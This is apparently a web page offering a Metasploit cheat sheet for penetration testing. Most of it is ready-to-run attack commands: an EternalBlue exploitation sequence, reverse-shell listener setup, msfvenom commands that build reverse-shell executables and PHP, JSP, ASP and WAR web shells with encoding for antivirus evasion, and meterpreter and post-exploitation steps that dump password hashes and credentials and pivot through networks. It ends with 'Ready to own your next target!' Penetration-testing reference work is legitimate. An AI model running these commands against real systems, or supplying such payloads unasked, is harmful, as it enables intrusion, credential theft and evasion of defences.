Metasploit Cheat Sheet
Complete Exploitation Framework Reference
2000+ exploits • Payloads • Post-exploitation • Msfconsole commands
📅 Updated: December 2024 • ⏱️ 25 min read • 🔧 Metasploit 6.x
📑 Quick Navigation
Basic Commands
Searching
Exploits
Payloads
Meterpreter
Post-Exploitation
Handlers
Database
What is Metasploit?
Metasploit Framework is the world's most widely used penetration testing framework. Originally developed by H.D. Moore in 2003, it's now maintained by Rapid7. The framework includes thousands of exploits, hundreds of payloads, and extensive post-exploitation capabilities.
Metasploit comes pre-installed on Kali Linux. The free Community Edition is available at metasploit.com.
📦 Installation & Starting
Kali Linux (Pre-installed)
msfconsoleStart with Database
sudo msfdb init
msfconsoleStart Quietly (No Banner)
msfconsole -qExecute Commands on Start
msfconsole -x "use exploit/..."🧭 Basic Navigation Commands
| Command | Description |
|---|---|
| help | Show all available commands |
| help <command> | Get help for specific command |
| exit / quit | Exit msfconsole |
| back | Go back from current module |
| banner | Display random banner |
| version | Show framework version |
| history | Show command history |
| connect <ip> <port> | Connect to host (like netcat) |
🔍 Searching Modules
# Basic searchsearch <keyword># Search by typesearch type:exploit <keyword>search type:auxiliary <keyword>search type:post <keyword>search type:payload <keyword># Search by platformsearch platform:windows <keyword>search platform:linux <keyword># Search by CVEsearch cve:2021-44228# Search by authorsearch author:hdm# Combined searchsearch type:exploit platform:windows smb# Search by rank (excellent, great, good)search rank:excellent type:exploit
Module Types
exploit
Exploit vulnerabilities
auxiliary
Scanners, fuzzers, etc.
post
Post-exploitation modules
payload
Shellcode and payloads
encoder
Payload encoding
nop
NOP generators
evasion
AV evasion modules
⚙️ Using Modules
| Command | Description |
|---|---|
| use <module> | Select a module to use |
| info | Show module information |
| options / show options | Display module options |
| show advanced | Show advanced options |
| set <option> <value> | Set option value |
| setg <option> <value> | Set global option (persists) |
| unset <option> | Clear option value |
| show payloads | List compatible payloads |
| show targets | List exploit targets |
| check | Check if target is vulnerable |
| run / exploit | Execute the module |
| exploit -j | Run as background job |
📋 Example: Exploiting EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attacker>
exploit💣 Payloads
Payload Types
| Type | Description |
|---|---|
| singles | Self-contained payloads (no stager needed) |
| stagers | Small payloads that download the stage |
| stages | Downloaded by stagers (e.g., meterpreter) |
Common Payloads
# Windows Meterpreter (staged)windows/meterpreter/reverse_tcpwindows/x64/meterpreter/reverse_tcp# Windows Meterpreter (stageless)windows/meterpreter_reverse_tcpwindows/x64/meterpreter_reverse_tcp# Linux Meterpreterlinux/x86/meterpreter/reverse_tcplinux/x64/meterpreter/reverse_tcp# Simple shellswindows/shell/reverse_tcplinux/x86/shell/reverse_tcp# HTTPS payloads (bypass firewalls)windows/meterpreter/reverse_httpswindows/x64/meterpreter/reverse_https
💡 Staged vs Stageless
Staged (/) — smaller initial payload, downloads meterpreter. Stageless (_) — complete payload, larger but more reliable. Use stageless when network restrictions may block the stage download.
🎮 Meterpreter Commands
Core Commands
| help | Show all commands |
| background | Background current session |
| exit | Terminate meterpreter session |
| sysinfo | System information |
| getuid | Current user ID |
| getpid | Current process ID |
| ps | List running processes |
| migrate <pid> | Migrate to another process |
| shell | Drop to system shell |
File System Commands
| pwd | Print working directory |
| cd <path> | Change directory |
| ls | List files |
| cat <file> | Read file contents |
| download <file> | Download file to attacker |
| upload <file> | Upload file to target |
| edit <file> | Edit file with vim |
| search -f <pattern> | Search for files |
Privilege Escalation
| getsystem | Attempt to get SYSTEM privileges |
| getprivs | List available privileges |
| hashdump | Dump password hashes (requires SYSTEM) |
| load kiwi | Load Mimikatz extension |
| creds_all | Dump all credentials (kiwi) |
Network & Pivoting
| ipconfig / ifconfig | Show network configuration |
| arp | Display ARP cache |
| route | View routing table |
| portfwd add -l <lport> -p <rport> -r <host> | Port forwarding |
| run autoroute -s <subnet> | Add route for pivoting |
📡 Handlers & Listeners
# Set up handler for reverse shelluse exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST <attacker> set LPORT 4444 run# Run as background jobexploit -j# One-liner handlermsfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <attacker>; set LPORT 4444; run"
🔗 Session Management
| Command | Description |
|---|---|
| sessions | List all active sessions |
| sessions -i <id> | Interact with session |
| sessions -k <id> | Kill session |
| sessions -u <id> | Upgrade shell to meterpreter |
| sessions -c <cmd> | Run command on all sessions |
⚙️ Jobs Management
| jobs | List running jobs |
| jobs -k <id> | Kill a job |
| jobs -K | Kill all jobs |
🔧 Msfvenom Payload Generation
Msfvenom is used to generate standalone payloads outside of msfconsole.
# Windows executablemsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f exe -o shell.exe# Windows DLLmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f dll -o shell.dll# Linux ELFmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f elf -o shell.elf# PHP shellmsfvenom -p php/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.php# Python shellmsfvenom -p python/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.py# JSP shellmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f raw -o shell.jsp# ASP shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -f asp -o shell.asp# WAR filemsfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker> LPORT=4444 -f war -o shell.war# With encoding (AV evasion)msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker> LPORT=4444 -e x64/xor_dynamic -i 5 -f exe -o shell.exe
Msfvenom Options
| -p | Payload to use |
| -f | Output format (exe, dll, elf, raw, etc.) |
| -o | Output file |
| -e | Encoder to use |
| -i | Encoding iterations |
| -b | Bad characters to avoid (e.g., \x00\x0a) |
| -l payloads | List all payloads |
| -l formats | List output formats |
| -l encoders | List encoders |
🗄️ Database Commands
# Initialize databasesudo msfdb init# Check database statusdb_status# Create workspaceworkspace -a <name># Switch workspaceworkspace <name># Import nmap scandb_import nmap_scan.xml# Run nmap from msfconsoledb_nmap -sV -O <target># View hostshosts# View servicesservices# View vulnerabilitiesvulns# View credentialscreds# View lootloot
🎯 Useful Post-Exploitation Modules
# Windowspost/windows/gather/hashdumppost/windows/gather/credentials/credential_collectorpost/windows/gather/enum_logged_on_userspost/windows/gather/enum_applicationspost/windows/manage/enable_rdppost/multi/recon/local_exploit_suggester# Linuxpost/linux/gather/hashdumppost/linux/gather/enum_users_historypost/linux/gather/enum_system# Multi-platformpost/multi/gather/ssh_credspost/multi/recon/local_exploit_suggester
📚 Additional Resources
⚔️ Metasploit Cheat Sheet Complete!
You now have a comprehensive reference for the most powerful exploitation framework in cybersecurity. From enumeration to exploitation to post-exploitation, these commands are used by penetration testers worldwide.
Exploits
Payloads
Meterpreter
Post-Exploitation
Msfvenom
Ready to own your next target!